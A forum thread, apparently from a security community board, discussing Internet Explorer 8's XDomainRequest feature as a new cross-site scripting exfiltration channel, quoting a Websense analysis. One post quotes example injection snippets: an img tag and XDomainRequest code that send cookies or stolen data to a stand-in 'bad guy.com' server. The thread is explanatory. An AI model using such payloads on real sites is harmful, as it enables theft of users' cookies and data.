IE8 comes with a completely new dangerous attack vector!

Hi malware fighters,

Internet Explorer 8 comes with all kind of new features
that makes computer crime a lot easier,
according to security vendor Websense the new Microsoft browser,
of which the first beta has been launched recently, supports cross-domain requests.
In this way attackers can more readily abuse certain vulnerabilities in websites…
As a rule cross-site-scripting leaks work through an img tag,
while this is one of the few features that are allowed to communicate out.
Through the new XDR objectan attacker may inject scriptcode
that directly communicated with the malicious server.

“Through this kind of direct communication it is expected
that injection payloads will get more complex and through various features.
Malicious frameworks can be builkt so the client can be in continuous
communication with the malicious server
to see what actions should be performed.
Stealing private data is only the beginning
of what these new technologies will accomplish,”
according to security researcher Joren McReynolds.

Websense makes it clear that the problem is not only in Internet Explorer 8,
because other browsers like Firefox will implement this also.
“The benefits of being able to directly communicate are that large
when product development and interactivity are concerned,
that other browser will bring this feature in.
Security and functionality are not the best matched pairt,
that leads to extrapolations without a clear solution in sight.”

Yes my malware fighters.
This here is a completely new feature: In Javascript an XmIHttpRequest
could only be sent to the same domain (‘same origin policy’).
This new interface does not have that restriction.
So a completely new and dangerous attack vector has been created,

polonus

So a completely new and dangerous attack vector has been created,
Has it been exploited or is this just theory ???

Hi bob3160,

No it has not been exploited yet, but it is not only theory, it goes further it is likelihood 100& and applied security so far 0%: http://www.websense.com/securitylabs/blog/blog.php?BlogID=177
The only restrictions made with XDR are protocols must match (so http and https mismatch = verboten) and xDomainRequests Allowed header must have a value of 1:
http://msdn2.microsoft.com/en-us/library/cc288108(VS.85).aspx
This statement on IE 8 just illustrates the security arms race. Vendors race to patch, protect and enhance their software to lock out threats. But those threats just keep evolving. By time IE 8 clears its beta hurdles there will be new threats to take advantage of whatever scheme Microsoft has cooked up.

polonus

It doesn’t surprise me that they have found a vulnerability already, but thankfully for most people it has been found at the beta stage.

That is probably linked to the new webslices - where you get an RSS feed from part of another web page that can be viewed whilst surfing elsewhere. Haven’t tried that function yet

Hi essexboy,

Webslices is another feature. The feature in question is anonymous third party XDomainRequests:

Cross-domain Request (XDR) - XDomainRequest, is the easiest way to make anonymous requests to third-party sites that support XDR and opt in to making their data available across domains. But the server that does so can be a malicious one.
Security Concerns

Because Internet Explorer 8 allows cross domain requests, malicious attackers can use content injection holes in Web sites a lot more efficiently. Typically, when a site is vulnerable to XSS (cross-site scripting), an attacker will inject content to steal user information and relay it back as follows:

<imgsrc=“http://bad guy.com/steal.php?cookie=” + cookie />

The tag is used because it is one of the few things allowed to communicate externally. With the new XDR object, the attacker can simply insert script code that communicates directly to a malicious server:

var xdr = new XDomainRequest();
xdr.open(“POST”, “http://www.bad guy.com/”);
xdr.send(stolenInfo);

With direct communication, it is foreseeable that injection payloads will evolve in complexity and features. Malicious frameworks can be built so that the client is constantly communicating with the malicious server to determine what actions to take next. Stealing user information is just the start of what can be achieved with new emerging technologies such as these. Also consider this new attack vector aided by Flash?!?

Conclusion

The concept of direct, external communication via the XDR object in Microsoft Internet Explorer 8 is nothing new. Similar communication has been achieved through other means, such as img tags, script src includes, iframes, flash files, and so on. It is also important to note that IE8’s external communication policy is not extremely unique and actually resembles Flash’s; both retrieve policy information on the request host (XDomainRequestAllowed header and crossdomain.xml respectively). The benefit of direct communication is so large in terms of product development and interactivity that other browsers, such as Firefox, are also implementing cross-domain request capabilities into their product. Security is always at odds with functionality, leading to tradeoffs without a clear solution.

This XDR implementation has come into FF 3 also now. Let us see who will direct the security implications of this first?

polonus

This XDR implementation has come into FF 3 also now.
If that's the case, then this subject should also include the fact that this vulnerability also comes with Firefox 3.

I don’t want to make website anymore :frowning:

There is too many complicated site hacking thingamabobs